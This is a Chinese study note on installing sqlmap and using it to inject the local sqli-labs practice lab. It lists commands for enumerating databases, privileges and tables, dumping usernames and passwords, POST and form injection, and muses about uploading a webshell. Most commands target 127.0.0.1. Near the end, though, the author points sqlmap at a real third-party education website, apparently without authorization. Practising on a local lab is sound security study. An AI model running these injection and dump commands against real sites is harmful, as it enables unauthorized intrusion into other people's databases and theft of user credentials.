sqlmap

sqlmap 基于Python2.7

因为我平时用得是 Python3.6,所以这里切换一下:

py2和3都安装结束后 接下来就是检查环境变量,缺少的我们需要添加。
在path中找以下4个变量

1.c:\Python27
2.c:\Python27\Scripts
3.c:\Python36
4.c:\Python36\Scripts

少哪个加哪个,注意分号隔开

然后就能: py -2
py -3
实现版本切换了。但是不稳定


sqlmap_第1张图片
py版本切换.png

把sqlmap解压到Python27里,再在文件夹里新建.bat文件,(cmd.exe),以实现直接打开此地址的命令。

输入: sqlmap.py -h 启动sqlmap

某道友写的操作:https://www.jianshu.com/p/17509d0a1ba3

以第一关测试下:

C:\Python27\sqlmapproject-sqlmap-509bb41>sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1"

会得到:

图1
sqlmap_第2张图片
1.png
sqlmap_第3张图片
sqlmap功能作用.png
sqlmap_第4张图片
查看数据量.png

貌似很重要的东西呢

--current-db     当前使用数据库
--current-user   当其使用用户名
--count -D "security"    查看数据量
--privileges     查看用户权限(比较长
--delay 5   或  -safe-freq  延时注入

大概MySQL的注入顺序:
图2


sqlmap_第5张图片
2.png

最后的报字段这样写: --dump -C "username" -T "users" -D "security"

空格很重要

交互式:礼尚往来
注入点的用户权限必须最高
webshell?
似乎可以通过这个上传脚本木马

python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C"id,password,username" --dump 报字段的具体内容

post注入可以说是灵魂了

burp抓文件:

python sqlmap.py -r "C:\233" -p uname --dbs  (规则同上) uname看源代码
-p uname -D security --tables               猜表
-p uname -D security -T users --columns     猜列

发送给本页面自己:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --forms
form表单action=" "   也会给出payload

指定下参数:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --data "uname=1&passwd=1"

下面那些就是无意义的尝试了

http://i.mooc.chaoxing.com/space/index.shtml
python sqlmap.py -u "http://i.mooc.chaoxing.com/space/index.shtml" --forms
form表单action=" "
python sqlmap.py -r "C:\23333\244" -p password --dbs

C:\23333

python sqlmap.py -u "http://127.0.0.1/message/register.php" --forms
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --data "nam=1&pwd=1"

你可能感兴趣的:(sqlmap)